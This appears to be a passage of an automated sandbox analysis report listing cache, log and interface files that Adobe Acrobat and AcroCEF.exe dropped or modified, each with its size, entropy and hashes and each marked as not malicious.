Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 298 |
Entropy (8bit): | 5.146070969512726 |
Encrypted: | false |
SSDEEP: | 6:iO461UB9+q2PN72nKuAl9OmbnIFUtS6LLJZmws6LL9VkwON72nKuAl9OmbjLJ:7dUB4vVaHAahFUtpJ/LD5OaHAaSJ |
MD5: | 98E5BD5F6682B7CA194E376CF860584B |
SHA1: | CB9269C828F825E338AEE8A89DDCE7EFB9F10633 |
SHA-256: | CDC2D0937E421F515B75B1D9945E2CD352DD60493EC80C7F44420694487EB0E7 |
SHA-512: | 7303886A189D7C3584CCEB0BA46268B2930AF7453F0A49FF4DA2749750A1AC6CF98AA325B26D538956C57760F78707AE510438B06F23B37BCFA59B0B2D10A98C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 298 |
Entropy (8bit): | 5.146070969512726 |
Encrypted: | false |
SSDEEP: | 6:iO461UB9+q2PN72nKuAl9OmbnIFUtS6LLJZmws6LL9VkwON72nKuAl9OmbjLJ:7dUB4vVaHAahFUtpJ/LD5OaHAaSJ |
MD5: | 98E5BD5F6682B7CA194E376CF860584B |
SHA1: | CB9269C828F825E338AEE8A89DDCE7EFB9F10633 |
SHA-256: | CDC2D0937E421F515B75B1D9945E2CD352DD60493EC80C7F44420694487EB0E7 |
SHA-512: | 7303886A189D7C3584CCEB0BA46268B2930AF7453F0A49FF4DA2749750A1AC6CF98AA325B26D538956C57760F78707AE510438B06F23B37BCFA59B0B2D10A98C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.139940636994319 |
Encrypted: | false |
SSDEEP: | 6:iO46KGUWkQ+q2PN72nKuAl9Ombzo2jMGIFUtS6KEcdWZmws6KTpQVkwON72nKuAv:7iGUs+vVaHAa8uFUtEPW/OTiV5OaHAaU |
MD5: | A489D5CE630E3CF83081E17D2E8D36FE |
SHA1: | D5E0C93ED03FB050DF02F3D5E593B7243FAE1A06 |
SHA-256: | EA399397F8362642D871D70C8877140283EA6BA8B274885B6CA64EAD76EBE508 |
SHA-512: | 0821E4991F15FE64B33939315409341D3A20C4BA915B80F3BFF7AF2D54B08A474AB8E775A27810D00BD7FEE2AF9B34436919A99C53B69D1A8397FA22998A4A36 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.139940636994319 |
Encrypted: | false |
SSDEEP: | 6:iO46KGUWkQ+q2PN72nKuAl9Ombzo2jMGIFUtS6KEcdWZmws6KTpQVkwON72nKuAv:7iGUs+vVaHAa8uFUtEPW/OTiV5OaHAaU |
MD5: | A489D5CE630E3CF83081E17D2E8D36FE |
SHA1: | D5E0C93ED03FB050DF02F3D5E593B7243FAE1A06 |
SHA-256: | EA399397F8362642D871D70C8877140283EA6BA8B274885B6CA64EAD76EBE508 |
SHA-512: | 0821E4991F15FE64B33939315409341D3A20C4BA915B80F3BFF7AF2D54B08A474AB8E775A27810D00BD7FEE2AF9B34436919A99C53B69D1A8397FA22998A4A36 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\12ef9acd-0521-4732-818c-4757eb23ee8e.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.971316048517525 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqYsBdOg2HWcaq3QYiubcP7E4TX:Y2sRdswdMHp3QYhbA7n7 |
MD5: | 0F62260949E3312647E56931ABCB4C2B |
SHA1: | 9FCA929BF739DCA3CA1424DB3203BF97C85EBEE0 |
SHA-256: | 91CB9CDFA58440C73A7EBC14772E56913ABB34AF995D826CCFB7B2ADD36559B4 |
SHA-512: | 613DFF5AC5D79AEA9232436C401E1675D07EB3F4B37D8F4E3E1EBC743D55AA0D1AC5282F8DA68692B93D56A881C0BBBE018721C671EB0A995CCCFC8EBE9D29F9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.971824627296864 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7 |
MD5: | F326539D084B03D88254A74D6018F692 |
SHA1: | 395B367E0E3554C3E78A8211F2D4B9F0F427CA87 |
SHA-256: | 9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007 |
SHA-512: | C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF4bd93c.TMP (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.971824627296864 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7 |
MD5: | F326539D084B03D88254A74D6018F692 |
SHA1: | 395B367E0E3554C3E78A8211F2D4B9F0F427CA87 |
SHA-256: | 9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007 |
SHA-512: | C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\e38888c0-7cf9-42f8-837e-2ba314f1e16b.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.971824627296864 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7 |
MD5: | F326539D084B03D88254A74D6018F692 |
SHA1: | 395B367E0E3554C3E78A8211F2D4B9F0F427CA87 |
SHA-256: | 9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007 |
SHA-512: | C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5449 |
Entropy (8bit): | 5.250834902516089 |
Encrypted: | false |
SSDEEP: | 96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7KUa2z:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhp |
MD5: | 7E44B4D5ABB76AC92760BCA880325D07 |
SHA1: | D573D9947B82C88A55C4500D9498C0CAA024404A |
SHA-256: | 8D8EC5796C5A8186267F4D6C2FEDCA9F8DD1AF7FAA78A0F52261AC3B1F65DCD2 |
SHA-512: | D78A27124C8CF8CB746326914F725EF514C4F24A76C7D17765D248D7B88E2E6465D9A0E407EC16CA3CB7680AF26C506322850C8610CA54BE9C4F4843F13C8EC7 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.134998099739829 |
Encrypted: | false |
SSDEEP: | 6:iO46I1Q+q2PN72nKuAl9OmbzNMxIFUtS6IQzdWZmws6IoPkQVkwON72nKuAl9Omk:7L+vVaHAa8jFUt/W/FpV5OaHAa84J |
MD5: | 9D9E3671BE49A896EECEC5C64EC5816D |
SHA1: | 9AE763B80410EE73AF0D7FD0C6876E2FD4E9F5A5 |
SHA-256: | FE343837C08D546EFC031DAD8D20CD9524ACFA7306F2DE8E5416F0F38B3F982F |
SHA-512: | 9ED60EED89692F59DDF76677ABEB99207BD512291D6DC7B5A2147227271A32028EC720CAB1AA87E3C099884B43AA4DC9A181DEED55FC65FA5C9DD9AC4EE1294D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.134998099739829 |
Encrypted: | false |
SSDEEP: | 6:iO46I1Q+q2PN72nKuAl9OmbzNMxIFUtS6IQzdWZmws6IoPkQVkwON72nKuAl9Omk:7L+vVaHAa8jFUt/W/FpV5OaHAa84J |
MD5: | 9D9E3671BE49A896EECEC5C64EC5816D |
SHA1: | 9AE763B80410EE73AF0D7FD0C6876E2FD4E9F5A5 |
SHA-256: | FE343837C08D546EFC031DAD8D20CD9524ACFA7306F2DE8E5416F0F38B3F982F |
SHA-512: | 9ED60EED89692F59DDF76677ABEB99207BD512291D6DC7B5A2147227271A32028EC720CAB1AA87E3C099884B43AA4DC9A181DEED55FC65FA5C9DD9AC4EE1294D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.444622108588136 |
Encrypted: | false |
SSDEEP: | 384:SeYci5ttiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:QGs3OazzU89UTTgUL |
MD5: | 3E4BBE6F4E84772CA051F5E4C3EE75B8 |
SHA1: | 20CA344A54B33562939D94B07876369603A63DF0 |
SHA-256: | 071EBB78F7809BF1CBBAC6E8B39B8B47D8B0E7F404786BD7D4CEF3AEB00E9156 |
SHA-512: | E139A90BFA442EAE1639C2B5E013D98E38D49EB84FB8550F001AC1A6BD012A2B9F21CDF94553FD59DBE6C67324A7EF42C6A6302FAC88DE51C0CB67035DDFD0DE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2104152413970626 |
Encrypted: | false |
SSDEEP: | 24:7+tvenuwKxWqLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Z:7MGnCYqPmFTIF3XmHjBoGGR+jMz+LhH |
MD5: | FFF107ADCC677B764BFD9F7D2333320E |
SHA1: | CD18B7CC77C5037DB4C912E6ECEBFD90FE25CBDF |
SHA-256: | 32FE062B2DF896E672939A92BBB62B81A830DD46E71F86724B3C413715F03434 |
SHA-512: | 7B937664AD148AFE9A48084956B05DDB822A67935CA4DC27C3618F4718E5A04B6CB00CD016F38971DFB1F997ABE75FBE7AE69D17958C87B2D0B8F2C467B5FDF6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7464657457678783 |
Encrypted: | false |
SSDEEP: | 3:kkFkl81pEttfllXlE/HT8k5rtNNX8RolJuRdxLlGB9lQRYwpDdt:kKl1yeT84rTNMa8RdWBwRd |
MD5: | 4ACEFBD3CA41886A7C64511407EA4730 |
SHA1: | CA337FC9FBEF456C0461C5E194A9C6900C157578 |
SHA-256: | A17537F29CAA3873B69C58B15DBB51D1EE7B72F7821FD87D4F7D7F74FC7759CC |
SHA-512: | 61A6B772AA9F4381F49F70021BA10A0B1D8F9F3F029C3B108F96631FE16C05DC8765CBB663EE9B68CB1A6CDFED60F50DB1E9C8888D0F1E5847E9FC073C50CB93 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.1391791584200512 |
Encrypted: | false |
SSDEEP: | 6:kKWL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:uiDnLNkPlE99SNxAhUe/3 |
MD5: | 0C45A9F6806DB58A5CF3299668D5D517 |
SHA1: | 7BB9BC71D515B3651CE0C481B529EB1D6A46B102 |
SHA-256: | 7AA03E7B4547810EF0FE61AD0EC32D5C1E472E0368A9B213A2795E8269EF9ED2 |
SHA-512: | 5FBFA778C44050D0C56E8CBBA5A1BD9209DD288578FB62EF51D16C6C39BF003F7926AEED7AE93F30B9D671DA5234684A9237EC7A8C8E47454FEDDDEFC9475994 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.374092666508465 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBSaraun0nZiQ0YdDoAvJM3g98kUwPeUkwRe9:YvXKXB9Z0c+sGMbLUkee9 |
MD5: | ACF5C41BCC505E714DFBEA9FADBD96F2 |
SHA1: | A7E014B3138A4BE0292F5E51BFA8EF99CF2BCD2B |
SHA-256: | AF668144DB8F9DA6ADC68B8378DF481E8FA5286AF1D701290029917A18AC6E50 |
SHA-512: | A0E6A29D4A7412D49EE1F267E4240A32F871379F98952E77A62BDF4C481DD93891CF115D08C211BE6188AEC2B11386667C7B606C189C0D484E5DBF9343017ACB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.3306043406255865 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBSaraun0nZiQ0YdDoAvJfBoTfXpnrPeUkwRe9:YvXKXB9Z0c+sGWTfXcUkee9 |
MD5: | D26C22EDE7F4D8A2DA73021DE53E203F |
SHA1: | 368456F881F45C5DDCF7031CD3D97509A4DECCC8 |
SHA-256: | A7BD7BD8318D0A69E8E862DBC3B6E8ECBFBC49932E3047C3794550693179BF6B |
SHA-512: | 8E9973C38F2E38EE65B3C0EDC31604A688700749908EA0FB48949A0B7E52042DEA86F66850D596571E472BF92DEF7BD74BB9A9411DBE9EDA419613697840D1AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.308147538844209 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBSaraun0nZiQ0YdDoAvJfBD2G6UpnrPeUkwRe9:YvXKXB9Z0c+sGR22cUkee9 |
MD5: | 13D5D88E3549C99DD0DFEE88D717557B |
SHA1: | 739CEB60EF5B13E1D0114EAB591EA830583CA7F7 |
SHA-256: | 2D1B821178A1AC738CEDC8C74045D24938BF523BA4BE805CFB4ED7210BD9D493 |
SHA-512: | CC0D2DDAA7E0BDFD81AEE968ED215E91D54926D2A3D7594AD079DE5C5B9D24A5105A91667939278D094E4D572A047C9119E61A64E7CD48D1F6FF334B5605E504 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.354491708144026 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBSaraun0nZiQ0YdDoAvJfPmwrPeUkwRe9:YvXKXB9Z0c+sGH56Ukee9 |
MD5: | 2D94EE8A3C80A9FD4FEF2DF96BA59AD2 |
SHA1: | DEAEE8B5444658F450BDBE6D8D3890CF25B7474A |
SHA-256: | F3FE86EA8912CCA56311A79DA71F78858C56E45B69DD0383FB4F09426CE907BA |
SHA-512: | E2452E742EFF2110608AE5ADFFFA74FDB3C145BF944B51424263197737FA77585956035035D31A6F6075B6822091BDF0AF022756C2692181DD99A8A5DD6463D3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.695866384182046 |
Encrypted: | false |
SSDEEP: | 24:Yv6XB5+JpLgE9cQx8LennAvzBvkn0RCmK8czOCCSxr:YvE0hgy6SAFv5Ah8cv/V |
MD5: | 8AA3EB6DAC97947C287A3877CD100975 |
SHA1: | D43696EE04D609FEC45C07D3106F33D231514254 |
SHA-256: | F203D5E742DA42AE2C20384CC9C2EFEE1A44DE8FE128CDD45C8DDAAD8267929A |
SHA-512: | 34F68339B1D3E7A907FE2E1F67BB3F136487CFE1FD5A755CF63E600A538167242DF63FCE81B3700FDA8A62BF46B95C5178A61CD3C454A555F489B57EB0377EC1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.3056024276378695 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBSaraun0nZiQ0YdDoAvJf8dPeUkwRe9:YvXKXB9Z0c+sGU8Ukee9 |
MD5: | 4C5A410D0ED857715E38B8A3CC7587C9 |
SHA1: | AAF4AAE59EBB0080E8DAD5ECF3184AA059D889BC |
SHA-256: | 13F6AE05C33D90BFE498D99B76499FBF2DA37BD3A4DD9EDFF7923573C6C5DA45 |
SHA-512: | 6B449A3F29E67F0FF9D41EAF73172A02C4E9D98A0240B7960F8FB6B5A8286458A269DF45D8E405BCF7894C882CB0DDE4A8624304E1C1362F26AB283BBC5D1981 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.308487919988014 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBSaraun0nZiQ0YdDoAvJfQ1rPeUkwRe9:YvXKXB9Z0c+sGY16Ukee9 |
MD5: | 9228E32F7E1B43994E4A917AB1086E26 |
SHA1: | 70890B1FD6AA138714A8994C1ED547FB871D4BAA |
SHA-256: | 98DAAEC21A5C96C974CC9FDDEEA18840DB03652E91D8DF5ECE1F82AE93969314 |
SHA-512: | C97920909D3143781BD1FAD5F74A2DADEDFCCE80FE24B260726260483C74861F4AE30B3A57E6FF3BC3AB4748DEC0E7301FA2A87CD0FB1E0522C775ADF205EFDA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.31654141390221 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBSaraun0nZiQ0YdDoAvJfFldPeUkwRe9:YvXKXB9Z0c+sGz8Ukee9 |
MD5: | A6D2DC3D8770CEFB0D1336600797B8E9 |
SHA1: | 638AF54D3E890D8398AC3C2D22A86C085538EA70 |
SHA-256: | 44BA467F63DD24681E676D11EE951072672F3575F4F8F1B206C1176E7F85C80C |
SHA-512: | 4C9028232CDAC5B54B460057BA2BFFBF2719D3CE84736EAB585A5770A49EF95D520EA9AD20A3B9691FD8DD039E2519EDFCA075F95D93D89007D118EC0F740111 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.333491790657271 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBSaraun0nZiQ0YdDoAvJfzdPeUkwRe9:YvXKXB9Z0c+sGb8Ukee9 |
MD5: | 172C57FA32B0BB85ED42BC3A0D179439 |
SHA1: | 077786EC7C2D373CDA6BA1C9A97774126C5DA798 |
SHA-256: | 539771907DDA348B52B8AC332705D53DAD91F65079F0D47B43B9D83FE2D50D4A |
SHA-512: | 5F2089001DB81CBB5AEC6BC1EF0843D9D8050ED1A31AD0A835AE9907C13D90DAB1E71AAC7F32B0F1928C000B0C991341A30B859711C709C5DB2E395C4FD540E3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.314135033759616 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBSaraun0nZiQ0YdDoAvJfYdPeUkwRe9:YvXKXB9Z0c+sGg8Ukee9 |
MD5: | ACDE1E2C078427EE1FD9C7CE0409A893 |
